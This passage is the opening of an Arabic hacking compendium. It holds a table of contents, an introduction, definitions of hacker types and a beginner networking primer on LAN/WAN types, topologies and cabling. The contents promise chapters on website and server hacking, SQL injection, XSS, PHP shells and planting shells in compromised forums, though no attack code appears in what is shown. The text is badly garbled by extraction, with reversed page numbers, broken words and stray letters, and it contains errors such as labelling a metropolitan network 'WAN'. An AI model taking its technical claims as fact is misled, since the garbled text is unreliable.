أكبر كتاب في عالم الاختراق emad dwiadar

Page 1

‫مقدمة‪1 7......................................................................................‬‬ ‫قسم الشبكات‪ :‬‬ ‫الھ اكرز والكراكرز‪9...............................................................................‬‬ ‫ملف عن الشبكات‪ 11.....................................................................‬‬ ‫خدمة ‪ 19...........................................................................Finger‬‬ ‫ماھو ‪ 27................................................................................FTP‬‬ ‫ماھو نقل الملفات ‪ 30........................................................... ?FTP‬‬ ‫‪ TCP/IP 4 Idiots‬الجزء الول‪ 63.......................................................‬‬ ‫‪ TCP/IP 4 Idiots‬جزء الثاني ‪ 05.......................................................‬‬ ‫‪ TCP/IP 4 Idiots‬الجزء الثالث‪ 16.....................................................‬‬ ‫‪ TCP/IP4 Idiots‬الجزء الرابع‪ 76.......................................................‬‬ ‫ماھو‪ 76.............................................................................HTTP‬‬ ‫بروتوكول ‪ ) TCP/IP‬الجزء الول) ‪ 48................................................‬‬ ‫بروتوكول ‪ ) TCP/IP‬الجزء الثاني) ‪ 88..............................................‬‬ ‫بروتوكول ‪ ) TCP/IP‬الجزء الثالث) ‪ 29..............................................‬‬ ‫بروتوكول ‪ ) TCP/IP‬الجزء الرابع) ‪ 79................................................‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الخامس ‪ 401.......................................)-1-‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الخامس ‪ 801.......................................)-2-‬‬ ‫بروتوكول ال ‪ HTTP‬تحت المجھ ر‪ 611.................................................‬‬ ‫ماھو ‪ 119.............................................................................CGI‬‬ ‫ماھو ‪ 121..........................................................Buffer Overflows‬‬ ‫دراسة ‪ 126..........................................................................BOF‬‬ ‫‪ 2‬‬ ‫ماھو ‪ 130..................................................................Send Mail‬‬ ‫ماھو ‪ 3134.........................................................................POP‬‬ ‫ماھ و التلنت‪ 731........................................................................‬‬ ‫ماھو ‪ 144..........................................................................DNS‬‬ ‫ماھو ‪ 148.............................................................................IP‬‬ ‫بروتوكول الستخدام اللسلكي (‪ 153................................... (WAP‬‬ ‫الشبكات اللسلكیة‪ 651.............................................................‬‬ ‫برتوكول القشرة المنة‪ 181.................................................... ssh‬‬ ‫شرح ‪ Ssl‬الجزء الول‪ 281............................................................‬‬ ‫شرح ‪ Ssl‬الجزء الثاني‪481................................................................‬‬ ‫ما ھو بروتوكول ‪ 187......................................................... Socks‬‬ ‫توصیل النترنت بنايل سات ‪ 091............................................201‬‬ ‫‪ 3‬‬ ‫قسم الحماية‪ :‬‬ ‫المخاطر المنیة على شبكة الويب والوقاية منھا(‪491.......................... )1‬‬ ‫المخاطر المنیة على شبكة الويب والوقاية منھا(‪691.......................... )2‬‬ ‫السرية في النترنت‪991...................................................................‬‬ ‫ی في النترنت؟‪202.......................................‬‬ ‫ھ ل يمكن أن تتجول متخف ً‬ ‫ا‪ ‬‬ ‫ملف ‪203..........................................................................htaccess‬‬ ‫أساسیات التشفیر‪ 902....................................................................‬‬ ‫ماذا تعرف المواقع التى تزورھ ا عنك؟‪ 312.............................................‬‬ ‫شرح وظیفة ‪ Isa‬لحل كثیر من المشاكل المنیة على الشبكة‪ 612...........‬‬ ‫ماذا يعرف عنك المزود؟‪ 222..............................................................‬‬ ‫ماذا يكشف رقم البي نمبر؟‪ 422.......................................................‬‬ ‫‪ StealthZapper‬لمسح تحركاتك من على السیرفر‪ 522..........................‬‬ ‫شرح طريقة استرجاع المنتدى بعد اختراقه بالصور‪ 232..........................‬‬


‫كیف تبقى مجھول الھ وية ؟!!‪ 832.....................................................‬‬ ‫كیف تبقى مجھول الھ وية ؟!!‪ 342.....................................................‬‬ ‫طرق حمايه المنتدى‪ 942................................................................‬‬ ‫قسم الختراق‪ :‬‬ ‫‪ 257..............................................................anonymous Access‬‬ ‫الختراق عن طريق ال‪ 259........................................................FTP‬‬ ‫الختراق عن طريق التلنت‪ 362.......................................................‬‬ ‫اختراق المواقع‪ 662......................................................................‬‬ ‫كیفیة الختراق (الجزء الول) ‪ 972...................................................‬‬ ‫اختراق المواقع (الجزء الثاني) ‪ 682.................................................‬‬ ‫اختراق موقع مجاني‪ 392..............................................................‬‬ ‫‪ 296...........................................................FrontPage Extension‬‬ ‫اختراق المواقع من نوع‪ 303...................................... philboard.asp‬‬ ‫تعلم الختراق‪ 703......................................................................‬‬ ‫‪ 4‬‬ ‫اختراق المواقع‪913....................................................................‬‬ ‫الدلیل الكامل لختراق سیرفرات ‪326........................................IIS‬‬ ‫شرح لثغرات ال ‪ php‬المشھ وره مع نموذج عملي‪233.......................‬‬ ‫شرح ثغرة سجل الزوار‪ 043.........................................................‬‬ ‫اختراق الديجي شات احدث الطرق لتخطى الحماية‪443...................‬‬ ‫شرح تخطي مجلد الحمايه للدمن‪ 453.........................................‬‬ ‫السیف مود ما ھ و وكیفیفة تخطیه وكیفیة تفعیله على السیرفر‪ 653..‬‬ ‫‪ 360.................................................Exploiting Cisco Systems‬‬ ‫اختراق السیرفرات عن طريق النت كات( ‪ 377................... (NetCat‬‬ ‫ماھ و الختراق العشوائي‪ 783....................................................‬‬ ‫كیفیة اكتشاف ثغرات الـ‪ 391................................. SQL Injection‬‬ ‫تعلم(‪ 400............................................................... (phpshell‬‬ ‫طريقة البحث عن الكسبلويتات ‪ +‬أخذ رووت‪ 114...........................‬‬ ‫استغلل ثغرات‪ 416............................................................ xss‬‬ ‫‪0.1S4ALog v ,,‬لوج خفیف و دون قاعدة بیانات‪ 224........................‬‬ ‫اكتشاف ثغره حديثه ‪ Invision Power Board‬من ‪ 3.0.2‬وماتحت‪ 524..‬‬ ‫شرح احدى ثغرات الصندوق السحري‪ 824.....................................‬‬ ‫طريقة رفع الشل في منتدي مخترق‪ 534......................................‬‬ ‫شرح ‪ Nuke 7.4 Add Admin‬بالصور‪ 834........................................‬‬ ‫كیفیة استغلل ثغرة ‪ 443........................................... WebHints‬‬ ‫‪ 5‬‬ ‫قسم الدوات والمهارات‪ :‬‬ ‫أساسیات إكتشاف وإستغلل ثغرات أنظمة التشغیل‪844........................‬‬ ‫دراسة موقع الضحیة‪164.................................................................‬‬ ‫اتخلص اكبر قدر ممكن من المعلومات عن الموقع من خلل الدومین‪564...‬‬ ‫‪467.............................................................Remote OS Detection‬‬ ‫أداة ‪ 482................................................................................PHP‬‬ ‫ھل تريد شلااا حقیقیا‪ 884..............................................................‬‬ ‫تعلم كیفیة ترجمة الثغرات بلغة البیرل مع تطبیق عملي‪ 094..................‬‬ ‫ارسال رسالة مزيفة بالتلنت‪ 694......................................................‬‬ ‫‪ 503...................................................................Network Sniffing‬‬ ‫شرح تفصیلى للكوكى اديتور‪ 605.....................................................‬‬ ‫شرح برنامج ‪ 511.................................................................nmap‬‬ ‫شرح برنامج ‪ 534.................................... Shadow Security Scanner‬‬ ‫قسم القاموس والمصطلحات‪ :‬‬


‫قاموس‪ 835................................................................................‬‬ ‫مصطلحات شائعة‪ 865..................................................................‬‬ ‫‪ 6‬‬ ‫بسم االله الرحمن الرحیم‪ ‬‬ ‫وبعد‪ ‬‬ ‫أحمد االله تعالى على إتمام ھذا الكتاب والذي يضم أھم المواضیع في القسام‬ ‫التالیة‪ ‬‬ ‫‪ -1‬الشبكات‪ ‬‬ ‫‪ -2‬الحماية‪ ‬‬ ‫‪ -3‬إختراق المواقع‪ ‬‬ ‫‪ -4‬أدوات ومھارات‪ ‬‬ ‫‪ -5‬القاموس والمصطلحات المنتشرة‪ ‬‬ ‫وتم وضع الكتاب لجمیع المستويات من الصفر حتى الحتراف ‪ ,‬ولم أغفل‪ ‬‬ ‫المواضیع الشیقة أو القديمة الساسیة والتى أعتقد أن يكون لھا نفع للقارئ‪ .‬‬ ‫ونأسف لوجود بعض الخطاء في كتاب المواضیع‪ ,‬وبعض المواضیع لم أجد لھا‪ ‬‬ ‫كاتب‪ .‬‬ ‫ويعلم االله كم استنفذ ھذا الكتاب مني من جھد ومشقة ولكن كل ما أريده ھو‬ ‫دعوة صالحة في ظھر الغیب لستاذي (‪ (BrUtE HaCk‬رحمه االله وأسكنه‪ ‬‬ ‫م‪ .‬‬ ‫فسیح جناته فقد كان عونا لى دائ َ‬ ‫ا‪ ‬‬ ‫ودعوة لي بالتوفیق في ھذه الحیاة ‪ .‬‬ ‫وأرجوا نشر الكتاب حتى تعم الفائدة ‪,‬واالله من وراء القصد‪ ‬‬ ‫وأي استفسار أرجوا إرساله على ‪ servex@live.de‬‬ ‫وشكرا‪ .‬‬ ‫مع تحيات‪ ‬‬ ‫‪ mr_Shark96‬‬ ‫وفريق‪ ‬‬ ‫‪ BrUtE HaCk‬‬ ‫‪ 7‬‬ ‫الھاكرز والكراكرز‪8 ‬‬ ‫للكاتب‪ mr_shark96 :‬‬ ‫لمن تطلق كلمة ھاكر؟‪ ‬‬ ‫كان في اواخر الستینات تطلق كلمة ھ اكر على المحترفین في البرمجة في‪ ‬‬ ‫لغات ذلك الوقت كالبیزك والفروتران ثم تحولت الى المخترقین والمخربین‪ ‬‬ ‫وجدت شھرة أكبر عند بداية ظھور الفیروسات والديدان‪ .‬‬ ‫من ھو الھاكر؟‪ ‬‬ ‫شخص له القدرة كذلك على دخول الجھزة المبحرة في عالم النترنت‪ ‬‬ ‫ويستطیع كذلك تأمین الشبكات وحل مشكلت الشبكة له القدرة على البرمجة‬ ‫أو اساسیات البرمجة مثل لغة ‪ C‬أو ‪ PHP‬أو ‪ Perl‬أو ‪ .ASP‬‬ ‫من ھو الكراكرز؟‪ ‬‬ ‫شخص لديه القدرة على البرمجة ويستطیع اختراق الجھزة للحصول على‪ ‬‬ ‫معلومة سرية أو اختراق مزودات الشركات لضفة او خذف شئ ما وكذلك كسر‬ ‫الشفرات ووفكھ ا وبقدرته على البرمجة يستطیع تطوير أدواته لتناسب كل‪ ‬‬ ‫الظروف‪ .‬‬ ‫أنواع الھاكرز؟‪ ‬‬ ‫(‪ – )1‬القبعات البیضاء ‪ :‬ھم الذين يخترقون بأوامر من سلطات‪ .‬‬ ‫(‪ – )2‬القبعات الرمادية ‪ :‬ھم باختصار يؤمنون بحرية المعلومات فھم‪ ‬‬ ‫يخترقون لمعرفة نقاط الضعف أو لمن الشبكات‪ .‬‬ ‫(‪ – )3‬القبعات الوداء ‪ :‬يخترق اما للحصول على معلومة معینة لتجارتھا أو‪ ‬‬ ‫للحصول على المال‪ .‬‬


‫ھناك أنواع أخرى من الھاكر ‪ :‬‬ ‫(‪ : Phreak – )1‬ھو ھاكر يستطیع التجسس على المھاتفات أو الدخول‪ ‬‬ ‫عن طريق الشبكات الھ اتفیة ويتخدمون تقنیات عالیة وأجھزة كأجھزة‪ ‬‬ ‫التحكم في موجات اصوت‪ ...‬‬ ‫(‪ : Cypherpunks – )2‬ھو ھ اكر يستطیع التشفیر إما عن طريق البرامج أو‪ ‬‬ ‫إستخدام خوارزمیات معقدة فمن الصعب جدا فك ذلط التشفبر‪ .‬‬ ‫(‪ : Cyberpunk – )3‬ھو ھ اكر يستطیع استخدام مزيجا من الطرق السابقة‬ ‫وھذا النوع من الھاكر يستطیع القرصنة على القنوات الفضائیة‪ .‬‬ ‫‪ 9‬‬ ‫( ‪ )4‬‬ ‫– ‪ : Spoofing‬ھذا النوع من الھ اكر يستطیع ارسال رسائل مزيفة‬ ‫فیدعي أنه شركة معینة فیحصل على مايريد (الیوزر نايم والباسوورد)‪.‬‬ ‫( ‪ )5‬‬ ‫– ‪ : IP Spoofing‬ھاكر يستطیع إعطاء ‪ IP‬وھمي لخداع المزودات‬ ‫الخدمة فیصعب تحديد مكان الجھاز‪ .‬‬ ‫( ‪ )6‬‬ ‫– ‪ : Web Spoofing‬يستطیع تصمیم موقع مشابه لموقع اخر معین‬ ‫فیخدع المستخدم في ھذا الموقع فیاخذ الھاكر ما يريد‪ .‬‬ ‫( ‪ )7‬‬ ‫– ‪ : Nuking‬وھ ي عمیة ارسال قنابل بريدية أو ارسال نوع من الحزم‬ ‫ألى شبكة عینة فتحدث أضرار‪ .‬‬ ‫‪ 01‬‬ ‫ملف عن الشبكات‪ ‬‬ ‫للكاتب‪ MariJuana :‬‬ ‫‪ /‬‬ ‫| ‪ --‬الشبكة‪ ‬‬ ‫| ‪ --‬انواع الشبكات‪ ‬‬ ‫‪ | ­ LAN‬‬ ‫‪ | ­ WAN‬‬ ‫‪ | ­ MAN‬‬ ‫| ‪--‬اھمیة استخدام الشبكات‪ ‬‬ ‫| ‪ -‬المشاركة في استخدام البیانات و المعلومات‪ ‬‬ ‫| ‪ -‬المشاركة في استخدام الكونات المادية و البرامج‬ ‫| ‪ --‬طبولوجیا الشبكة‪ ‬‬ ‫النجمیة | ‪ -‬الطبولوجیا‪ ‬‬ ‫الحلقیة | ‪ -‬الطبولوجیا‪ ‬‬ ‫الخیطیة | ‪ -‬الطبولوجیا‪ ‬‬ ‫الھجینة | ‪ -‬الطبولوجیا‪ ‬‬ ‫الخـطیة | ‪ -‬الطبولوجیا‪ ‬‬ ‫| ‪ --‬انواع كابلت التوصیل‪ ‬‬ ‫| ‪ -‬الكابل المحوري‪ ‬‬ ‫| ‪ -‬كابل رقیق‪ ‬‬ ‫| ‪ -‬كابل سمیك‪ ‬‬ ‫| ‪ -‬الكابل المزدوج الملفوف‪ ‬‬ ‫| ‪ -‬الكابل المزدوج المجدول‪ ‬‬ ‫| ‪ -‬الكابل المزدوج المعزول‪ ‬‬ ‫| ‪ -‬كابل الياف الضوئیة‪ ‬‬ ‫| ‪ --‬نقل الشارات الكترونیة‪ ‬‬ ‫| ‪ -‬طريقة النقل ذات المدى القاعدي‪ ‬‬ ‫| ‪ -‬طريقة النقل ذات المدى الواسع‪ ‬‬ ‫‪ 11‬‬ ‫الشبكة ( ‪ ( Network‬‬ ‫الشبكة ھ ي نظام اتصالت يقوم بربط عدة حواسیب والتجھیزات الطرفیة‪ ‬‬ ‫المرافقة بعضھا ببعض بصورة مشابھة نوعا م للشبكة الھاتفیة بھدف تقديم‪ ‬‬


‫الخدمات الحاسوبیة المختلفة للمثتثمرين ‪ .‬‬ ‫كلمة شبكة ( ‪ ( Network‬تشیر إلى أثنین أو أكثر من أجھزة الحاسب متصلین‪ ‬‬ ‫معا ‪ .‬وھناك عدة أسباب لربط أجھزة الحاسب فى شبكة أھمھا ما يلي ‪ :‬‬ ‫· اتصال أجھزة الحاسب يسمح باتصال الشخاص ونقل‪ ‬‬ ‫المعلومات‪ .‬‬ ‫· اتصال أجھ زة الحاسب يسمح بمشاركة موارد الحاسب‪ .‬‬ ‫ھناك ثلث انواع شبكات الحاسب ‪ :‬‬ ‫الشبكات المحلیة ( ‪ ( Local Area Networks‬‬ ‫وتختصر ( ‪ ( LAN‬وفیه يتم ربط الحاسبات بطريقة مباشرة باستخدام نوع معین‬ ‫من الكابلت ‪ ,‬وھي شبكة بین عدة اجھ زه لتذيد المسافة بینھا عن ‪5.2‬كم و‪ ‬‬ ‫تستخدم في المؤسسات و الشركات فیمكن ربط الجھزة و الطابعات ‪..‬و ھو‪ ‬‬ ‫من اكثر الشبكات انتشارا و استخداما ‪ .‬‬ ‫الشبكة الواسعة ( ‪ (Wide Area Networks‬‬ ‫وتختصر ( ‪ ( WAN‬وھ و ينتج عادة من ربط عدة شبكات محلیة ببعضھا من خلل‪ ‬‬ ‫خطوط التلیفون أو بواسطة القمر الصناعي أو المیكروويف ‪ ,‬و ھي شبكة كبیره‪ ‬‬ ‫يمكنھا ربط اجھزه على مسافه ‪05‬كم ‪,‬و تعتبر العمود الفقري لشبكة النترنت‬ ‫حیث انھا تستطیع ربط شبكات محلیة مع بعضھا مما يمكنھ ا لتغطیة مدينة او‪ ‬‬ ‫دولة ‪ ..‬‬ ‫شبكات المدن ( ‪ ( Metropolitan Area Networks‬‬ ‫وتختصر الى ً) ً‪ ( WAN‬و ھي شبكة بین حاسبات عديدة اقصى مسافة لھا ‪53‬‬ ‫كم و يمكن لھ ا ربط فروع شركة او شبكة بین حواسیب شارع معین ‪ ..‬‬ ‫اھمیة استخدام الشبكات‪ ‬‬ ‫‪ -1‬المشاركة في استخدام البیانات و المعلومات ‪ .‬‬ ‫‪ 21‬‬ ‫‪ -2‬المشاركة في استخدام الكونات المادية و البرامج ‪ .‬‬ ‫‪ -1‬المشاركة في استخدام البیانات و المعلومات ‪ -:‬‬ ‫حیث يكون من اسھ ل تبادل البیانات بعد تشبیك الجھ زة بدل من استخدام‪ ‬‬ ‫الديسكات في ذلك ‪ ,‬فیمكن لي شخص على الشبكة ان يسحب ملف معین و‬ ‫مجلد كامل ‪ -‬و قد تكون سمحت له بذلك‪ -‬فالشبكه تسھل تبادل البیانات كما‪ ‬‬ ‫لو انك تتعامل مع جھاز واحد فیتم تبادل البیانات بسھوله و سرعة ‪ .‬‬ ‫‪ -2‬المشاركة في استخدام الكونات المادية و البرامج ‪ .‬‬ ‫وھ ي من اعظم فائد الشبكة ‪ ,‬فیمكن ليشخص على الشبكة ان يستخدم‪ ‬‬ ‫مثل الطابعة التي موجوده على جھاز اخر على نفس الشبكة‪ ‬‬ ‫ويمكننا ان نقول ان الشبكات تنقسم لقسمین ‪ -:‬‬ ‫‪ -1‬شبكات الند للند ‪ Peer­To­Peer‬‬ ‫‪ -2‬شبكات الخوادم ‪ Server­Based‬‬ ‫‪ -1‬شبكات الند للند ‪ Peer­To­Peer‬‬ ‫من المعروف دائما ان في جمیع الشبكات يوجد بما يسمى الخادم ‪ Server‬‬ ‫ولكن في ھ ذا النوع من الشبكات ل يوجد خادم و بالتالي فان جمیع الجھزة‪ ‬‬ ‫تكون متساوية فكل مستخدم مسؤل عن جھازة ( البیانات المتاحة ‪ -‬مستوى‪ ‬‬ ‫التأمین ‪ ) ..‬و يعرف كل جھاز من الجھزة المتصلة بالشبكة بالند ‪ .‬‬ ‫وتعرف ھذه الشبكات ايضا باسم ‪ Work groups‬حیث ان ھذا النوع من‪ ‬‬ ‫الشبكات يمثل مجموعة عمل صغیرة فجب ان تكون الجھزة المكونة للشبكة‪ ‬‬ ‫حوالي ‪ 01‬اجھزة او اقل ‪ ,‬و من ھنا نستطیع ا نقول ان تكلفة ھذه الشبكات‪ ‬‬ ‫قلیله اذا ما قورنت بالنوع الخر ( ل حاجة لوجود خوادم ‪ . ) ..‬‬ ‫‪ -2‬شبكات الخوادم ‪ Server­Based‬‬ ‫وھ ذا النوع من الشبكات يحتاج لوجود خادم قوي والذي يكون بمثل مدير‪ ‬‬ ‫للشبكة و الذي يستطیع التحكم فیھ ا ‪ .‬ومن احد ممیزات ھذا النوع من‪ ‬‬ ‫الشبكات ھو مستوى تأمینھا العالي ‪ ,‬و احدى الممیزات الخرى ھي امكانیة‪ ‬‬ ‫التحكم في النظام بحیث يقوم بعمل نسخة احتیاطیة تلقائیا كل مدة يحددھا‪ ‬‬


‫صاحب السرفر ‪.‬و ھ ذه الشبكة يمكن ان تتكون من مئات المستخدمین لھا‪ ‬‬ ‫فتعتبر مكافة اكثر من شبكات الند للند ‪ .‬‬ ‫‪ 31‬‬ ‫طبولوجیا الشبكة ‪ Network Toplogy‬‬ ‫ونقصد بطبلوجیا الشبكة ھ و تحديد المكونات المادية لھا و يمكن تقسیم‪ ‬‬ ‫طبولزجیا الشبكات الى ما يأتي ‪ -:‬‬ ‫‪ -1‬الطبولوجیا النجمیة ‪ Star Toplogy‬‬ ‫‪ -2‬الطبولوجیا الحلقیة ‪ Ring Toplogy‬‬ ‫‪ -3‬الطبولوجیا الخیطیة ‪ Mesh Toplogy‬‬ ‫‪ -4‬الطبولوجیا الھجینة ‪ Hybrid Toplogy‬‬ ‫‪ -5‬الطبولوجیا الخطیة ‪ Bus Topology‬‬ ‫‪ -1‬الطبولوجیا النجمیة ‪ Star Toplogy‬‬ ‫وھ ي احد طرق الشبیك القديمة و التي يم فیھا توصیل كل الجھزة ‪ Clients‬‬ ‫المكونة للشبكة بالخادم الرئیسي ‪ Server‬وھ ي ال ابسط الشبكات و تتمیز‪ ‬‬ ‫بسھ ولة اضافة او ازالة اي شخص نت الشبكة دون التأثیر على ادائھا و لكن من‬ ‫لحد العیوب الرئیسیة بھا ھ و انه عند حدوث اي خلل في الخادم ‪ Server‬‬ ‫يؤدي الى انھیار الشبكة بأكملھا ‪ .‬‬ ‫ولكن قد تم تطوير طريقة وصل الجھ زة بالخادم فاصبحت تكون متصلة بما يعرف‪ ‬‬ ‫ب ‪ Hub‬فلو حدث اي عطل في احد الجھزة التي على الشبكة ‪ -‬الكابل ‪ ..‬‬ ‫فسیتوقف عمل الجھ از على انه جزء من الشبكة ولكن سوف يستمر عمل‪ ‬‬ ‫الشبكة ‪ .‬‬ ‫‪ -2‬الطبولوجیا الحلقیة ‪ Ring Toplogy‬‬ ‫و تكون الجھ زة المكونة للشبكة على شكل حلقة ( دائرة ) فیتم وصل كل جھاز‬ ‫بالجھاز الذي يلیه فیتم وصل الجھاز الول و الخیر بالخادم ‪ . Server‬‬ ‫ويم وصل الجھ زة بكابل دائري واحد ‪ ,‬و عند حدوث اي عطل في جھاز على‪ ‬‬ ‫شبكة يؤثر على اداء الشبكة كلھا ‪ .‬‬ ‫وتنتقل البیانات في ھ ذه الشبكة بطرقة تعرف بال ‪ Token Passing‬و ‪Token‬ھو‬ ‫عبارة عن سلسلة من ال ‪ , Bits‬ويتحرك ال ‪ Token‬في اتجاة واحد فقط بعني‪ ‬‬ ‫اذا كانت ال ‪ Token‬بمشي في اتجاه الجھاز الذي على يمینه و يوجد جھاز‪ ‬‬ ‫على يسار ھذا الجھاز من المفترض وصول ال ‪ Token‬الیه‪ ‬‬ ‫ل بتجه الى الیسار بل بدور في كل الشبكة حتى يصل الى ھذا الجھاز‪ .‬‬ ‫ويتم تبادل البیانات عن طلريق ان الجھاز الرسل يقوم بوضع مثل بريد الكتروني‪ ‬‬ ‫على البیانات المرسله و يقوم ارسالھا و حتى تصل الى الجھاز و تطابق معه‪ ‬‬ ‫البريد الكتروني المرفق مع البیانات ‪ .‬و من ثم يرسب الجھاز المسقبل الى‪ ‬‬ ‫الراسل رسالة تدل على استقابلة للبیانات ‪ .‬‬ ‫‪ 41‬‬ ‫‪ -3‬الطبولوجیا الشبكیة ‪ Mesh Toplogy‬‬ ‫وفیھا يتم ربط الجمیع اجھزة ببعضھ ا عبر عدة كابلت بحیث يمكن استمرار عمل‬ ‫الشبكة عند حدوث اي عطل في اي جزء فیھا فعند حدوث خلل في اي كابل‪ ‬‬ ‫يتم ارسال البیانات عبر كابل اخر ‪ ,‬ولذلك فانھا مكلفة الى حد ما وذلك‪ ‬‬ ‫لستخدام عدد كبیر من الكبلت ‪ .‬‬ ‫‪ -4‬الطبولوجیا الھجینة ‪ Hybrid Toplogy‬‬ ‫ويعتبر ھ ذا النوع من الشبكات مزيج او خلیط نوعین او اكثر من النواع الربعة‪ ‬‬ ‫الخرى ( باستثناء ‪ ( Mesh Topolgy‬و يتم ذلك عن طريق وصل عدد من ال‪ ‬‬ ‫‪Hubs‬المكون للشبكات الخرى لتكوين ھذه الشبكة ‪ .‬‬ ‫‪ -5‬الطبولوجیا الخطیة ‪ Bus Topology‬‬ ‫ويتم توصیل الجھ زة في شكل خط مستقیم بكابل واحد يطلق علیه ‪Trunk -‬‬ ‫‪ Segment ­ Backbon‬ويتم ارسال البیانات التي تكون على الشبكة تكون‪ ‬‬ ‫على شكل اشارات الكترونیة ‪ ,‬فعد ارسال مثل ملف الى جھاز يتم ارساله‪ ‬‬ ‫الى جمیع الجھزة التي على الشبكة على ھیئة اشارات الكترونیة معھا‪ ‬‬


‫عنوان الجھلز مشفر ول يستقبل ھذا الملف ال الجھاز الذي يتطابق مع العنوان‬ ‫المشفر ‪ .‬‬ ‫ولذلك ليمكن لكثر من جھاز ارسال واستقبال البیانات مما يؤثر على سرعة‪ ‬‬ ‫واداء الشبكة ‪ .‬‬ ‫انواع كابلت التوصیل‪ ‬‬ ‫من اھ م مكونات الشبكة المادية ھي كبلت التوصیل بین الجھزه و التي يتم‪ ‬‬ ‫انتقال الشارات اللكرونیة فیھا بین الجھ زة المكونة للشبكة ‪ ,‬و يوجد اللف‪ ‬‬ ‫النوع من الكبلت حیث يمكنك اختیار الكبلت المناسبة لك حسب حجم‪ ‬‬ ‫الشبكة التي تريدھا و المتطلبات المختلفة ‪ ..‬‬ ‫ويمكننا تقسیم انواع الكابلت الى ‪ 3‬انواع رئیسیة ‪ -:‬‬ ‫‪ -1‬الكابل المحوري ‪ . Coaxial Cable‬‬ ‫‪ -2‬الكابل المزدوج الملفوف ‪ . Twisted­Pair Cable‬‬ ‫‪ -3‬كابل الياف الضوئیة ‪ .Fiber­Optic Cable‬‬ ‫‪ -1‬الكابل المحوري ‪ . Coaxial Cable‬‬ ‫‪ 51‬‬ ‫وھ و من اكثر انواع الكابلت تداول و يرجع ذلك الى ممیزاته العديدة مثل انه غیر‬ ‫مكلف فھو مناسب للشبكات الصغیرة كما انه سھل التعامل معه عند تركیبه ‪ ,‬‬ ‫ويتكون ھ ذا الكابل من شئ شبیه بانبوبة غیر مفرغة ‪ -‬او سلك ‪ -‬من النحاس‬ ‫و حولھا مادة عازلة و اخیرا غلف خارجي وفائدة العازل ھو حماية البینات التي‬ ‫تنتقل عبر الشبكة من التشويش و الذي ينتج من وجود اشارات الكتورنیة‪ ‬‬ ‫مشتته والتي تمنع انتقال الشارات عبر الشبكة ‪ .‬‬ ‫وبعد توضیع اجزاء السلك سوفف نعرف فوائدھا فسلك النحاسي ھو المسؤل‪ ‬‬ ‫عن تنقل الشارات الكترونیه و العازل فائدة حماية الشارات اللكترونیة كما‪ ‬‬ ‫ذكرنا من قبل ‪ ,‬واحدى ممیزات ھذا النوع من الكابلت ھو مقاومة التشويش ‪ .‬‬ ‫انواع الكابلت المحورية ‪ -:‬‬ ‫أ‪ -‬كابل رقیق ‪ Thinnrt‬‬ ‫ب‪ -‬كابل سمیك ‪ Thicknet‬‬ ‫أ‪ -‬كابل رقیق ‪ Thinnrt‬‬ ‫ھو احد انواع الكابلت المحورية و يتمیز بمرونته و خفة وزنه و سمكه الصغیر ‪ -‬‬ ‫حوالي ‪ .06‬سـم و يمكنھا التصويل بین اجھزه اقصى بعد بینھا ھو ‪ 081‬متر‪ ‬‬ ‫تقريبا و بعدھا تضعف الشارات اللكترونیة ‪ .‬‬ ‫ب‪ -‬كابل سمیك ‪ Thicknet‬‬ ‫ھ و احد انواع الكابلت المحورية ايضا وكما يظھ ر من اسمه ان الكابل نفسه‪ ‬‬ ‫سمیك و اكثر صلبة من النوع الخر و نتیجة لسمك الكابل السلك النحاسي‪ ‬‬ ‫اصبح اكثر سمكا و كنتیحه ايضا لذلك اصبح يمكنه توصیل الشارات اللتكورنیة‪ ‬‬ ‫لمسافة اطول ‪ -‬تصل الى نصف كیلو متر –‪ ‬‬ ‫‪ -2‬الكابل المزدوج الملفوف ‪ Twisted­Pair Cable‬‬ ‫ويتكون ھ ذا النوع من الكابلت في ابسط اشكاله من مجموعتین من السلك‪ ‬‬ ‫النحاسیة معزول كل منھم عن الخر و ملتف كل منھ م حول الخر ‪ ,‬فیتم جمع‬ ‫عدد من السلك ووضعھ ا داخل الغلف لتكوين الكابل ويوجد نوعین من ھذه‪ ‬‬ ‫الكابلت ھما ‪ -:‬‬ ‫ا‪ -‬الكابل المزدوج المجدول ( ‪ . UTP (Unshielded Twisted­pair‬‬ ‫ب‪ -‬الكابل المزدوج المعزول ( ‪ STP (Shilded Twisted­Pair‬‬ ‫ا‪ -‬الكابل المزدوج المجدول ( ‪ . UTP (Unshielded Twisted­pair‬‬ ‫‪ 61‬‬ ‫وھ و من اكثر انواع الكابلت انتشارا ويستخدم بشكل كبیر في الشبكات‪ ‬‬ ‫المحلیة ( ‪ ( LAN‬و يتكون من نوعین من السلك النحاسیة الملتفین حول‪ ‬‬ ‫يعضھم و يتوقف عدد ھذه التففات على الغرض الذي سوف يتم اسخدامه‪ ‬‬ ‫فیه و لكن من عیوبه الكبیره ھي خاصیة التداخل ‪ .‬‬ ‫التداخل ‪ :‬ھ و تداخل اشارات من كابل مع اشارات الكابل الخر ‪ .‬‬


‫‪ STP (Shilded Twisted­Pair‬‬ ‫‪S‬‬ ‫ب‪ -‬الكابل المزدوج المعزول (‬ ‫النحاسي‪ ‬‬ ‫ي‬ ‫ويتكون من مجموعتین من السلك المجدولة و يتمیز بان غطاءه‬ ‫ى‪ ‬‬ ‫افضل من نظیره في ‪ , UTP‬ال ان ھذا النواع من الكابلت ل يقتصر على‬ ‫الكابلت فقط للتشبیك بل يستدعي المر الى استخدام بعض الجھزة الخرى‬ ‫ى‬ ‫‪ .‬‬ ‫‪ Fiber­Optic Cable‬‬ ‫‪F‬‬ ‫‪ -3‬كابل اللیاف الضوئیة‬ ‫وھ ذا النوع يختلف تماما عن النوعین الخرين حیث ان البیانات تنتقل فیه على‬ ‫ى‬ ‫من‪ ‬‬ ‫ھیئة نبضات الكتروينه ويتمیز بسرعه نقل البیانات و صعوبة سرقة البیانات ن‬ ‫قالب‪ ‬‬ ‫خلله ‪.‬و يتكون ھذا الكابل من عدة اجزاء ھي ( من الداخل للخارج ) ‪ :‬ب‬ ‫فیتكون‪ ‬‬ ‫ن‬ ‫من الزجاج ‪ -‬طبقة من البلسیتك ( او الزجاج ) ‪ -‬طبقة حماية اخیره ‪,‬‬ ‫اي كابل من مجموعتین من اللیاف الضوئیة مجموعة خاصة بالستقبال وو‪ ‬‬ ‫الخرى خاصة بالرسال ‪ ..‬‬ ‫الكترونیة‪ ‬‬ ‫ة‬ ‫نقل الشارات‬ ‫‪ -:‬‬ ‫ھناك طريقتین لنقل الشارات اللكتروية عبر الكابل ‪-‬‬ ‫‪ Baseband‬‬ ‫‪B‬‬ ‫‪ -1‬طريقة النقل ذات المدى القاعدي‬ ‫‪ Broadband‬‬ ‫‪B‬‬ ‫‪ 